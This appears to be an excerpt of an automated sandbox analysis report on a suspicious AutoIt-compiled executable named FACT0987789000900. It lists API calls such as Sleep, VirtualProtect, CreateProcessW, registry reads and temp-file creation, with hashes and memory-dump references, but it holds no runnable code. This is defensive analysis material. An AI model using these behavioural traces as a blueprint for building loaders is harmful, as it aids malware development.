                                                                                                                • Instruction ID: 4de2bfeb1874814fa322d7a916910401292c16d4f5eef91c3f2a5fbdc61169d4
                                                                                                                • Opcode Fuzzy Hash: 0fb88f591884323bc4cddd8e5281ab118d7c5b07429d50c354fed021b6b3bec5
                                                                                                                • Instruction Fuzzy Hash: 42918271910219AFCF04EFA5CC919EDBBB8BF19314F10442EF816AB2D1DB35AA05CB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01348E40: Sleep.KERNELBASE(000001F4), ref: 01348E51
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0134907D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: QT5QIERKYZPGA2JIFXW
                                                                                                                • API String ID: 2694422964-1725631792
                                                                                                                • Opcode ID: 7a8ac76ae711c0f1efe4810ba4346e7c784060ee27eca4a82c2dff4b2e62916b
                                                                                                                • Instruction ID: f82178cc423b81a697da68b22adec107cba38e786e2905902e14e099ca00bb9b
                                                                                                                • Opcode Fuzzy Hash: 7a8ac76ae711c0f1efe4810ba4346e7c784060ee27eca4a82c2dff4b2e62916b
                                                                                                                • Instruction Fuzzy Hash: 2E516F70D04249DBEF11DBE4C858BEFBBB9AF19308F004599E608BB2C1D6795B44CBA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00495374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00551148,?,004961FF,?,00000000,00000001,00000000), ref: 00495392
                                                                                                                  • Part of subcall function 004949FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00494A1D
                                                                                                                • _wcscat.LIBCMT ref: 00502D80
                                                                                                                • _wcscat.LIBCMT ref: 00502DB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                                                • String ID: \$\Include\
                                                                                                                • API String ID: 3592542968-2640467822
                                                                                                                • Opcode ID: a98871a1b7a31e8ef263e75cfc834fc292efdff17531883610486f0dabdbfeae
                                                                                                                • Instruction ID: 48b0dae4b309265862a27c7f033d94dc5a2d0864fd5258bdb0bc2fef6e1fc687
                                                                                                                • Opcode Fuzzy Hash: a98871a1b7a31e8ef263e75cfc834fc292efdff17531883610486f0dabdbfeae
                                                                                                                • Instruction Fuzzy Hash: 5851A3724047409BC714EF66E9A189BBBF4BF6A305F40053FF645932A0EB34990CDB66
                                                                                                                APIs
                                                                                                                • __getstream.LIBCMT ref: 004B34FE
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 004B3539
                                                                                                                • __wopenfile.LIBCMT ref: 004B3549
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                • String ID: <G
                                                                                                                • API String ID: 1820251861-2138716496
                                                                                                                • Opcode ID: a3bf1ff179f3f01342d0f1264a1654dce11ee05b470100393a4379aa97ae16d8
                                                                                                                • Instruction ID: 86f97656ad3f1bf097c24c3aba2d6b028c88f78890793e06f84bd18a4fa27f97
                                                                                                                • Opcode Fuzzy Hash: a3bf1ff179f3f01342d0f1264a1654dce11ee05b470100393a4379aa97ae16d8
                                                                                                                • Instruction Fuzzy Hash: 88112B70900205AEDB21BF738C026EF3AB0AF45754B15891FE415C7281EB3CCA019779
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004AD28B,SwapMouseButtons,00000004,?), ref: 004AD2BC
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004AD28B,SwapMouseButtons,00000004,?,?,?,?,004AC865), ref: 004AD2DD
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,004AD28B,SwapMouseButtons,00000004,?,?,?,?,004AC865), ref: 004AD2FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 6b4d493f246bcabe3365276c12a5360feb1b4db05fe8c7ca43ad301d856bd84a
                                                                                                                • Instruction ID: 84c564db0e653120fd31a3aff7f22d74974cd7342f8233f3190396cfe106ea45
                                                                                                                • Opcode Fuzzy Hash: 6b4d493f246bcabe3365276c12a5360feb1b4db05fe8c7ca43ad301d856bd84a
                                                                                                                • Instruction Fuzzy Hash: 65117075911208BFDF108F64CC44EEF77B8EF59740F00445AF802D7210E635AE459764
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3877424927-0
                                                                                                                • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                • Instruction ID: 19c6327dfba7fd40d637b4279f86ebc986aa641c67da614ef322a67b3dbe5e5a
                                                                                                                • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                • Instruction Fuzzy Hash: 0651CAB0A00205ABDB249F6B88455DF77A5AF40325F24872FF425863D0DB78DF518B79
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00494517: _fseek.LIBCMT ref: 0049452F
                                                                                                                  • Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC65D
                                                                                                                  • Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC670
                                                                                                                • _free.LIBCMT ref: 004DC4DD
                                                                                                                • _free.LIBCMT ref: 004DC4E4
                                                                                                                • _free.LIBCMT ref: 004DC54F
                                                                                                                  • Part of subcall function 004B1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7A85), ref: 004B1CB1
                                                                                                                  • Part of subcall function 004B1C9D: GetLastError.KERNEL32(00000000,?,004B7A85), ref: 004B1CC3
                                                                                                                • _free.LIBCMT ref: 004DC557
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                • Instruction ID: c77455c4a648138f66d60b348cc4758c9ed0de8fa3a278b937f64bbe48a76ffc
                                                                                                                • Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                • Instruction Fuzzy Hash: 9B516CB1904219AFDF149F65DC91AAEBBB9EF48304F1000AFF219A3351DB755A80CF59
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004AEBB2
                                                                                                                  • Part of subcall function 004951AF: _memset.LIBCMT ref: 0049522F
                                                                                                                  • Part of subcall function 004951AF: _wcscpy.LIBCMT ref: 00495283
                                                                                                                  • Part of subcall function 004951AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00495293
                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 004AEC07
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004AEC16
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00503C88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: c1df77513c8e93a4a6886c9b6d16a3d22aa706376ab13906b7efbd85faa7d75a
                                                                                                                • Instruction ID: 091236341d9c45ff0a68e3295f6493fd19019c3ceadf468dd217b9cb8c5d1fc0
                                                                                                                • Opcode Fuzzy Hash: c1df77513c8e93a4a6886c9b6d16a3d22aa706376ab13906b7efbd85faa7d75a
                                                                                                                • Instruction Fuzzy Hash: 6E21DA705047949FF73397248859BEBBFECAF11318F04045EE69A96281C3746E84CB55
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(?,00001000,00000004,?,00000000), ref: 005B0147
                                                                                                                • VirtualProtect.KERNELBASE(?,00001000), ref: 005B015C
                                                                                                                Strings
                                                                                                                • as failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array va, xrefs: 005AFF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID: as failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array va
                                                                                                                • API String ID: 544645111-1882358474
                                                                                                                • Opcode ID: 0bf70e1fe289e165fbea26a3a945e7cd97a4af74671d22bdfa6f6cd26151ff97
                                                                                                                • Instruction ID: 474b719d42e6dc16cd321f41b36d4e33ce997c41b2380582a9e0dbae69fb3e38
                                                                                                                • Opcode Fuzzy Hash: 0bf70e1fe289e165fbea26a3a945e7cd97a4af74671d22bdfa6f6cd26151ff97
                                                                                                                • Instruction Fuzzy Hash: 46512572A543569FD720AEB8CC847B6BFA4FB423247681739D5E1C73C6E7A46806C360
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004B395C: __FF_MSGBANNER.LIBCMT ref: 004B3973
                                                                                                                  • Part of subcall function 004B395C: __NMSG_WRITE.LIBCMT ref: 004B397A
                                                                                                                  • Part of subcall function 004B395C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F
                                                                                                                • std::exception::exception.LIBCMT ref: 004AF51E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 004AF533
                                                                                                                  • Part of subcall function 004B6805: RaiseException.KERNEL32(?,?,0000000E,00546A30,?,?,?,004AF538,0000000E,00546A30,?,00000001), ref: 004B6856
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID: bad allocation
                                                                                                                • API String ID: 3902256705-2104205924
                                                                                                                • Opcode ID: 9fcf5365c30e7ffd7d858db2caaad6c75e3515c8d43f4f7bf8961d560494e04b
                                                                                                                • Instruction ID: dc4990b0ff6d3af6e15a2dbe011e1a94a4380812264a672e3902580c523567d5
                                                                                                                • Opcode Fuzzy Hash: 9fcf5365c30e7ffd7d858db2caaad6c75e3515c8d43f4f7bf8961d560494e04b
                                                                                                                • Instruction Fuzzy Hash: EAF08131504219A7D704BE9AD8019DE7BE8AF15358F60402BF90492181DBB8A68487B9
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01347BB5
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 01347BD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CreateExit
                                                                                                                • String ID: D
                                                                                                                • API String ID: 126409537-2746444292
                                                                                                                • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                • Instruction ID: bbc6b443a102ae528f474dac46822412719d53eeafb5d8a6f18dcd82641a17d5
                                                                                                                • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                • Instruction Fuzzy Hash: C2F0EC7554024DABDB60DFE4CC49FEE77BCBF08705F108508FB0A9A180DB74A6088B61
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004DC72F
                                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004DC746
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: 821ec9b1846ef78a6eb6d992ef4f7dbf64d15ca3621219ea62e52a37c88e4885
                                                                                                                • Instruction ID: b9ed039b2ff15fedc97336a5ff177bc58f8360f879c91b4288d6f66696da2b0f
                                                                                                                • Opcode Fuzzy Hash: 821ec9b1846ef78a6eb6d992ef4f7dbf64d15ca3621219ea62e52a37c88e4885
                                                                                                                • Instruction Fuzzy Hash: 9ED05E7950030EBBDB10AB90DC0EFCA7B7CA714708F0041A07A60A50B1DAB4E6998B64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ab30830fa0eb3f838868b0d6e474fe6b3b36a05303fc5cf4ef934a89be421a3
                                                                                                                • Instruction ID: 2a19ac058023f2a758e1cbdceee92e0a2dd00e4bba77f2ab35559c9e25919a5f
                                                                                                                • Opcode Fuzzy Hash: 4ab30830fa0eb3f838868b0d6e474fe6b3b36a05303fc5cf4ef934a89be421a3
                                                                                                                • Instruction Fuzzy Hash: 18F17D716043419FCB10DF25C891B5ABBE5FF88318F10892EF9959B392D778E909CB86
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00495022
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004950CB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell__memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 928536360-0
                                                                                                                • Opcode ID: 4cfe0ba22f167e201dfaa056fc9180acf9fea1ac83e336123510c1e29a6d4e18
                                                                                                                • Instruction ID: 5727472faf4c1ad8c257c9e49c05f5e7b417e5f320886a083ba693fb3669ed6d
                                                                                                                • Opcode Fuzzy Hash: 4cfe0ba22f167e201dfaa056fc9180acf9fea1ac83e336123510c1e29a6d4e18
                                                                                                                • Instruction Fuzzy Hash: 0A31AEB0504B00CFCB21EF24D84569BBFE8FF58309F10092FE59A82250E775A948CB9A
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 004B3973
                                                                                                                  • Part of subcall function 004B81C2: __NMSG_WRITE.LIBCMT ref: 004B81E9
                                                                                                                  • Part of subcall function 004B81C2: __NMSG_WRITE.LIBCMT ref: 004B81F3
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 004B397A
                                                                                                                  • Part of subcall function 004B821F: GetModuleFileNameW.KERNEL32(00000000,00550312,00000104,00000000,00000001,00000000), ref: 004B82B1
                                                                                                                  • Part of subcall function 004B821F: ___crtMessageBoxW.LIBCMT ref: 004B835F
                                                                                                                  • Part of subcall function 004B1145: ___crtCorExitProcess.LIBCMT ref: 004B114B
                                                                                                                  • Part of subcall function 004B1145: ExitProcess.KERNEL32 ref: 004B1154
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                • RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: 9035c8b74350df580c7ade0a6cd2425cdc02b339bf148654d971984aeabf39ad
                                                                                                                • Instruction ID: ef6da1eee76f5b3a9dd28cd78ae54239fa49cdc9da80e9d36bac2e63755dcb7f
                                                                                                                • Opcode Fuzzy Hash: 9035c8b74350df580c7ade0a6cd2425cdc02b339bf148654d971984aeabf39ad
                                                                                                                • Instruction Fuzzy Hash: 4901D6B12453019AE6153F3BEC52AEF23589B91B2AF60012FF5019B291DFBC9D00867C
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004DC385,?,?,?,?,?,00000004), ref: 004DC6F2
                                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004DC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004DC708
